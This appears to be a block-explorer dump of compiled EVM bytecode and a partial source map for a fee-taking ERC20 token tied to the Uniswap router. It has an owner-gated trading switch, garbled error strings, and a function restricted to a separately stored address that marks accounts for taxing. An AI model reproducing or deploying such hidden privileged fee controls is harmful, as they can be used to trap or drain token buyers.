82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612e68816121e7565b82525050565b6000612e7a8383612e5f565b60208301905092915050565b6000602082019050919050565b6000612e9e82612e33565b612ea88185612e3e565b9350612eb383612e4f565b8060005b83811015612ee4578151612ecb8882612e6e565b9750612ed683612e86565b925050600181019050612eb7565b5085935050505092915050565b600060a082019050612f06600083018861234b565b612f136020830187612e24565b8181036040830152612f258186612e93565b9050612f346060830185612461565b612f41608083018461234b565b9695505050505050565b600060c082019050612f606000830189612461565b612f6d602083018861234b565b612f7a6040830187612e24565b612f876060830186612e24565b612f946080830185612461565b612fa160a083018461234b565b979650505050505050565b600081519050612fbb8161222f565b92915050565b600080600060608486031215612fda57612fd96121c2565b5b6000612fe886828701612fac565b9350506020612ff986828701612fac565b925050604061300a86828701612fac565b915050925092509256fea264697066735822122048bb644f0b6943cba4ccbf8befe09eee3d05266c61be2b75df9fdaf9cc64833f64736f6c63430008110033

Deployed Bytecode

0x6080604052600436106101c65760003560e01c80636ddd1713116100f757806395d89b4111610095578063d469801611610064578063d469801614610645578063dd62ed3e14610670578063e2f45605146106ad578063f2fde38b146106d8576101cd565b806395d89b4114610575578063a457c2d7146105a0578063a9059cbb146105dd578063ccc56ccc1461061a576101cd565b806375f0a874116100d157806375f0a874146104dd5780638a8c523c146105085780638da5cb5b1461051f57806393ec52de1461054a576101cd565b80636ddd17131461045e57806370a0823114610489578063715018a6146104c6576101cd565b806327c8f8351161016457806349bd5a5e1161013e57806349bd5a5e146103b25780634ada218b146103dd5780636620cec9146104085780636b7ae8dc14610433576101cd565b806327c8f8351461031f578063313ce5671461034a5780633950935114610375576101cd565b806318160ddd116101a057806318160ddd14610265578063182073a414610290578063214013ca146102b957806323b872dd146102e2576101cd565b806306fdde03146101d2578063095ea7b3146101fd5780631694505e1461023a576101cd565b366101cd57005b600080fd5b3480156101de57600080fd5b506101e7610701565b6040516101f491906121a0565b60405180910390f35b34801561020957600080fd5b50610224600480360381019061021f919061225b565b610793565b60405161023191906122b6565b60405180910390f35b34801561024657600080fd5b5061024f6107b6565b60405161025c9190612330565b60405180910390f35b34801561027157600080fd5b5061027a6107da565b604051610287919061235a565b60405180910390f35b34801561029c57600080fd5b506102b760048036038101906102b291906123a1565b6107e4565b005b3480156102c557600080fd5b506102e060048036038101906102db91906123e1565b610895565b005b3480156102ee57600080fd5b506103096004803603810190610304919061240e565b6108ab565b60405161031691906122b6565b60405180910390f35b34801561032b57600080fd5b506103346108da565b6040516103419190612470565b60405180910390f35b34801561035657600080fd5b5061035f6108e0565b60405161036c91906124a7565b60405180910390f35b34801561038157600080fd5b5061039c6004803603810190610397919061225b565b6108e9565b6040516103a991906122b6565b60405180910390f35b3480156103be57600080fd5b506103c7610920565b6040516103d49190612470565b60405180910390f35b3480156103e957600080fd5b506103f2610946565b6040516103ff91906122b6565b60405180910390f35b34801561041457600080fd5b5061041d610959565b60405161042a919061235a565b60405180910390f35b34801561043f57600080fd5b5061044861095f565b6040516104559190612470565b60405180910390f35b34801561046a57600080fd5b50610473610985565b60405161048091906122b6565b60405180910390f35b34801561049557600080fd5b506104b060048036038101906104ab91906123e1565b610998565b6040516104bd919061235a565b60405180910390f35b3480156104d257600080fd5b506104db6109e0565b005b3480156104e957600080fd5b506104f26109f4565b6040516104ff9190612470565b60405180910390f35b34801561051457600080fd5b5061051d610a1a565b005b34801561052b57600080fd5b50610534610aaa565b6040516105419190612470565b60405180910390f35b34801561055657600080fd5b5061055f610ad4565b60405161056c919061235a565b60405180910390f35b34801561058157600080fd5b5061058a610ada565b60405161059791906121a0565b60405180910390f35b3480156105ac57600080fd5b506105c760048036038101906105c2919061225b565b610b6c565b6040516105d491906122b6565b60405180910390f35b3480156105e957600080fd5b5061060460048036038101906105ff919061225b565b610be3565b60405161061191906122b6565b60405180910390f35b34801561062657600080fd5b5061062f610c06565b60405161063c919061235a565b60405180910390f35b34801561065157600080fd5b5061065a610c0c565b6040516106679190612470565b60405180910390f35b34801561067c57600080fd5b50610697600480360381019061069291906124c2565b610c32565b6040516106a4919061235a565b60405180910390f35b3480156106b957600080fd5b506106c2610cb9565b6040516106cf919061235a565b60405180910390f35b3480156106e457600080fd5b506106ff60048036038101906106fa91906123e1565b610cbf565b005b60606005805461071090612531565b80601f016020809104026020016040519081016040528092919081815260200182805461073c90612531565b80156107895780601f1061075e57610100808354040283529160200191610789565b820191906000526020600020905b81548152906001019060200180831161076c57829003601f168201915b5050505050905090565b60008061079e610d42565b90506107ab818585610d4a565b600191505092915050565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b6107ec610f13565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161088991906122b6565b60405180910390a25050565b61089d610f91565b6108a8816001610fb7565b50565b6000806108b6610d42565b90506108c3858285611058565b6108ce8585856110e4565b60019150509392505050565b61dead81565b60006012905090565b6000806108f4610d42565b90506109158185856109068589610c32565b6109109190612591565b610d4a565b600191505092915050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b60149054906101000a900460ff1681565b60115481565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b60159054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109e8610f13565b6109f260006117ba565b565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610a22610f13565b600b60149054906101000a900460ff1615610a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6990612611565b60405180910390fd5b6001600b60146101000a81548160ff0219169083151502179055506001600b60156101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60035481565b606060068054610ae990612531565b80601f0160208091040260200160405190810160405280929190818152602001828054610b1590612531565b8015610b625780601f10610b3757610100808354040283529160200191610b62565b820191906000526020600020905b815481529060010190602001808311610b4557829003601f168201915b5050505050905090565b600080610b77610d42565b90506000610b858286610c32565b905083811015610bca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc1906126a3565b60405180910390fd5b610bd78286868403610d4a565b60019250505092915050565b600080610bee610d42565b9050610bfb8185856110e4565b600191505092915050565b600d5481565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600c5481565b610cc7610f13565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2d90612735565b60405180910390fd5b610d3f816117ba565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db0906127c7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1f90612859565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f06919061235a565b60405180910390a3505050565b610f1b610d42565b73ffffffffffffffffffffffffffffffffffffffff16610f39610aaa565b73ffffffffffffffffffffffffffffffffffffffff1614610f8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f86906128c5565b60405180910390fd5b565b3373ffffffffffffffffffffffffffffffffffffffff1660045414610fb557600080fd5b565b80601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b60006110648484610c32565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110de57818110156110d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c790612931565b60405180910390fd5b6110dd8484848403610d4a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611153576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114a906129c3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b990612a55565b60405180910390fd5b600b60149054906101000a900460ff16806112265750601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b8061127a5750601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6112b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112b090612ac1565b60405180910390fd5b600081036112d2576112cd83836000611880565b6117b5565b60006112dd30610998565b90506000600c5482101590508080156113025750600b60159054906101000a900460ff165b801561131b5750600b60169054906101000a900460ff16155b80156113705750601a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80156113c65750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561141c5750601960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611461576001600b60166101000a81548160ff02191690831515021790555061144582611af6565b6000600b60166101000a81548160ff0219169083151502179055505b6000600b60169054906101000a900460ff16159050601960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115175750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561152157600090505b6000811561179c57601a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561158457506000601154115b15611652576115b26127106115a460115488611d8b90919063ffffffff16565b611da190919063ffffffff16565b9050601154601454826115c59190612ae1565b6115cf9190612b52565b601760008282546115e09190612591565b92505081905550601154601254826115f89190612ae1565b6116029190612b52565b601560008282546116139190612591565b925050819055506011546013548261162b9190612ae1565b6116359190612b52565b601660008282546116469190612591565b92505081905550611778565b601a60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156116ad57506000601154115b15611777576116db6127106116cd60115488611d8b90919063ffffffff16565b611da190919063ffffffff16565b9050600d54601054826116ee9190612ae1565b6116f89190612b52565b601760008282546117099190612591565b92505081905550600d54600e54826117219190612ae1565b61172b9190612b52565b6015600082825461173c9190612591565b92505081905550600d54600f54826117549190612ae1565b61175e9190612b52565b6016600082825461176f9190612591565b925050819055505b5b600081111561178d5761178c873083611880565b5b80856117999190612b83565b94505b6117a7878787611880565b601854601181905550505050505b505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e690612c29565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361195e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195590612a55565b60405180910390fd5b611969838383611db7565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156119ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e690612cbb565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611add919061235a565b60405180910390a3611af0848484611dbc565b50505050565b6000601654601554601754611b0b9190612591565b611b159190612591565b905060008060028360175486611b2b9190612ae1565b611b359190612b52565b611b3f9190612b52565b90506000611b568286611dc190919063ffffffff16565b90506000479050611b6682611dd7565b6000611b7b8247611dc190919063ffffffff16565b90506000611ba687611b9860155485611d8b90919063ffffffff16565b611da190919063ffffffff16565b90506000611bd188611bc360165486611d8b90919063ffffffff16565b611da190919063ffffffff16565b90506000818385611be29190612b83565b611bec9190612b83565b9050600060178190555060006015819055506000601681905550600087118015611c165750600081115b15611c6357611c258782612014565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601754604051611c5a93929190612cdb565b60405180910390a15b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611ca990612d43565b60006040518083038185875af1925050503d8060008114611ce6576040519150601f19603f3d011682016040523d82523d6000602084013e611ceb565b606091505b505080985050600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611d3790612d43565b60006040518083038185875af1925050503d8060008114611d74576040519150601f19603f3d011682016040523d82523d6000602084013e611d79565b606091505b50508098505050505050505050505050565b60008183611d999190612ae1565b905092915050565b60008183611daf9190612b52565b905092915050565b505050565b505050565b60008183611dcf9190612b83565b905092915050565b6000600267ffffffffffffffff811115611df457611df3612d58565b5b604051908082528060200260200182016040528015611e225781602001602082028036833780820191505090505b5090503081600081518110611e3a57611e39612d87565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611edf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611f039190612dcb565b81600181518110611f1757611f16612d87565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f7c307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610d4a565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611fde959493929190612ef1565b600060405180830381600087803b158015611ff857600080fd5b505af115801561200c573d6000803e3d6000fd5b505050505050565b61203f307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610d4a565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016120c696959493929190612f4b565b60606040518083038185885af11580156120e4573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906121099190612fc1565b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561214a57808201518184015260208101905061212f565b60008484015250505050565b6000601f19601f8301169050919050565b600061217282612110565b61217c818561211b565b935061218c81856020860161212c565b61219581612156565b840191505092915050565b600060208201905081810360008301526121ba8184612167565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006121f2826121c7565b9050919050565b612202816121e7565b811461220d57600080fd5b50565b60008135905061221f816121f9565b92915050565b6000819050919050565b61223881612225565b811461224357600080fd5b50565b6000813590506122558161222f565b92915050565b60008060408385031215612272576122716121c2565b5b600061228085828601612210565b925050602061229185828601612246565b9150509250929050565b60008115159050919050565b6122b08161229b565b82525050565b60006020820190506122cb60008301846122a7565b92915050565b6000819050919050565b60006122f66122f16122ec846121c7565b6122d1565b6121c7565b9050919050565b6000612308826122db565b9050919050565b600061231a826122fd565b9050919050565b61232a8161230f565b82525050565b60006020820190506123456000830184612321565b92915050565b61235481612225565b82525050565b600060208201905061236f600083018461234b565b92915050565b61237e8161229b565b811461238957600080fd5b50565b60008135905061239b81612375565b92915050565b600080604083850312156123b8576123b76121c2565b5b60006123c685828601612210565b92505060206123d78582860161238c565b9150509250929050565b6000602082840312156123f7576123f66121c2565b5b600061240584828501612210565b91505092915050565b600080600060608486031215612427576124266121c2565b5b600061243586828701612210565b935050602061244686828701612210565b925050604061245786828701612246565b9150509250925092565b61246a816121e7565b82525050565b60006020820190506124856000830184612461565b92915050565b600060ff82169050919050565b6124a18161248b565b82525050565b60006020820190506124bc6000830184612498565b92915050565b600080604083850312156124d9576124d86121c2565b5b60006124e785828601612210565b92505060206124f885828601612210565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061254957607f821691505b60208210810361255c5761255b612502565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061259c82612225565b91506125a783612225565b92508282019050808211156125bf576125be612562565b5b92915050565b7f54726164696e6720616c7265616479206163746976652e000000000000000000600082015250565b60006125fb60178361211b565b9150612606826125c5565b602082019050919050565b6000602082019050818103600083015261262a816125ee565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061268d60258361211b565b915061269882612631565b604082019050919050565b600060208201905081810360008301526126bc81612680565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061271f60268361211b565b915061272a826126c3565b604082019050919050565b6000602082019050818103600083015261274e81612712565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006127b160248361211b565b91506127bc82612755565b604082019050919050565b600060208201905081810360008301526127e0816127a4565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061284360228361211b565b915061284e826127e7565b604082019050919050565b6000602082019050818103600083015261287281612836565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006128af60208361211b565b91506128ba82612879565b602082019050919050565b600060208201905081810360008301526128de816128a2565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061291b601d8361211b565b9150612926826128e5565b602082019050919050565b6000602082019050818103600083015261294a8161290e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006129ad60258361211b565b91506129b882612951565b604082019050919050565b600060208201905081810360008301526129dc816129a0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612a3f60238361211b565b9150612a4a826129e3565b604082019050919050565b60006020820190508181036000830152612a6e81612a32565b9050919050565b7f54726164696e67206e6f7420566974616c696b2079657420656e61626c656421600082015250565b6000612aab60208361211b565b9150612ab682612a75565b602082019050919050565b60006020820190508181036000830152612ada81612a9e565b9050919050565b6000612aec82612225565b9150612af783612225565b9250828202612b0581612225565b91508282048414831517612b1c57612b1b612562565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612b5d82612225565b9150612b6883612225565b925082612b7857612b77612b23565b5b828204905092915050565b6000612b8e82612225565b9150612b9983612225565b9250828203905081811115612bb157612bb0612562565b5b92915050565b7f45524332303a207472616e736665722066726f6d2074686520566974616c696b60008201527f207a65726f206164647265737300000000000000000000000000000000000000602082015250565b6000612c13602d8361211b565b9150612c1e82612bb7565b604082019050919050565b60006020820190508181036000830152612c4281612c06565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612ca560268361211b565b9150612cb082612c49565b604082019050919050565b60006020820190508181036000830152612cd481612c98565b9050919050565b6000606082019050612cf0600083018661234b565b612cfd602083018561234b565b612d0a604083018461234b565b949350505050565b600081905092915050565b50565b6000612d2d600083612d12565b9150612d3882612d1d565b600082019050919050565b6000612d4e82612d20565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050612dc5816121f9565b92915050565b600060208284031215612de157612de06121c2565b5b6000612def84828501612db6565b91505092915050565b6000819050919050565b6000612e1d612e18612e1384612df8565b6122d1565b612225565b9050919050565b612e2d81612e02565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612e68816121e7565b82525050565b6000612e7a8383612e5f565b60208301905092915050565b6000602082019050919050565b6000612e9e82612e33565b612ea88185612e3e565b9350612eb383612e4f565b8060005b83811015612ee4578151612ecb8882612e6e565b9750612ed683612e86565b925050600181019050612eb7565b5085935050505092915050565b600060a082019050612f06600083018861234b565b612f136020830187612e24565b8181036040830152612f258186612e93565b9050612f346060830185612461565b612f41608083018461234b565b9695505050505050565b600060c082019050612f606000830189612461565b612f6d602083018861234b565b612f7a6040830187612e24565b612f876060830186612e24565b612f946080830185612461565b612fa160a083018461234b565b979650505050505050565b600081519050612fbb8161222f565b92915050565b600080600060608486031215612fda57612fd96121c2565b5b6000612fe886828701612fac565b9350506020612ff986828701612fac565b925050604061300a86828701612fac565b915050925092509256fea264697066735822122048bb644f0b6943cba4ccbf8befe09eee3d05266c61be2b75df9fdaf9cc64833f64736f6c63430008110033

Deployed Bytecode Sourcemap

26845:8510:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7794:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9378:242;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26922:51;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8269:108;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29878:205;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30091:134;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9075:295;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27129:53;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7631:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10139:270;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26980:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27191:26;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27485:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27054:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27227:23;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8127:132;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1728:103;;;;;;;;;;;;;:::i;:::-;;27017:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29697:173;;;;;;;;;;;;;:::i;:::-;;1087:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7154:26;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8013:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9626:505;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8833:234;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27330:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27092:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8442:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27288:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1986:238;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7794:100;7848:13;7881:5;7874:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7794:100;:::o;9378:242::-;9497:4;9519:13;9535:12;:10;:12::i;:::-;9519:28;;9558:32;9567:5;9574:7;9583:6;9558:8;:32::i;:::-;9608:4;9601:11;;;9378:242;;;;:::o;26922:51::-;;;:::o;8269:108::-;8330:7;8357:12;;8350:19;;8269:108;:::o;29878:205::-;973:13;:11;:13::i;:::-;30017:8:::1;29980:25;:34;30006:7;29980:34;;;;;;;;;;;;;;;;:45;;;;;;;;;;;;;;;;;;30057:7;30041:34;;;30066:8;30041:34;;;;;;:::i;:::-;;;;;;;;29878:205:::0;;:::o;30091:134::-;30152:11;:9;:11::i;:::-;30174:43;30203:7;30212:4;30174:28;:43::i;:::-;30091:134;:::o;9075:295::-;9206:4;9223:15;9241:12;:10;:12::i;:::-;9223:30;;9264:38;9280:4;9286:7;9295:6;9264:15;:38::i;:::-;9313:27;9323:4;9329:2;9333:6;9313:9;:27::i;:::-;9358:4;9351:11;;;9075:295;;;;;:::o;27129:53::-;27175:6;27129:53;:::o;7631:93::-;7689:5;7714:2;7707:9;;7631:93;:::o;10139:270::-;10254:4;10276:13;10292:12;:10;:12::i;:::-;10276:28;;10315:64;10324:5;10331:7;10368:10;10340:25;10350:5;10357:7;10340:9;:25::i;:::-;:38;;;;:::i;:::-;10315:8;:64::i;:::-;10397:4;10390:11;;;10139:270;;;;:::o;26980:28::-;;;;;;;;;;;;;:::o;27191:26::-;;;;;;;;;;;;;:::o;27485:28::-;;;;:::o;27054:31::-;;;;;;;;;;;;;:::o;27227:23::-;;;;;;;;;;;;;:::o;8127:132::-;8201:7;8233:9;:18;8243:7;8233:18;;;;;;;;;;;;;;;;8226:25;;8127:132;;;:::o;1728:103::-;973:13;:11;:13::i;:::-;1793:30:::1;1820:1;1793:18;:30::i;:::-;1728:103::o:0;27017:30::-;;;;;;;;;;;;;:::o;29697:173::-;973:13;:11;:13::i;:::-;29759:14:::1;;;;;;;;;;;29758:15;29750:51;;;;;;;;;;;;:::i;:::-;;;;;;;;;29829:4;29812:14;;:21;;;;;;;;;;;;;;;;;;29858:4;29844:11;;:18;;;;;;;;;;;;;;;;;;29697:173::o:0;1087:87::-;1133:7;1160:6;;;;;;;;;;;1153:13;;1087:87;:::o;7154:26::-;;;;:::o;8013:104::-;8069:13;8102:7;8095:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8013:104;:::o;9626:505::-;9746:4;9768:13;9784:12;:10;:12::i;:::-;9768:28;;9807:24;9834:25;9844:5;9851:7;9834:9;:25::i;:::-;9807:52;;9912:15;9892:16;:35;;9870:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;10028:60;10037:5;10044:7;10072:15;10053:16;:34;10028:8;:60::i;:::-;10119:4;10112:11;;;;9626:505;;;;:::o;8833:234::-;8948:4;8970:13;8986:12;:10;:12::i;:::-;8970:28;;9009;9019:5;9026:2;9030:6;9009:9;:28::i;:::-;9055:4;9048:11;;;8833:234;;;;:::o;27330:27::-;;;;:::o;27092:30::-;;;;;;;;;;;;;:::o;8442:201::-;8576:7;8608:11;:18;8620:5;8608:18;;;;;;;;;;;;;;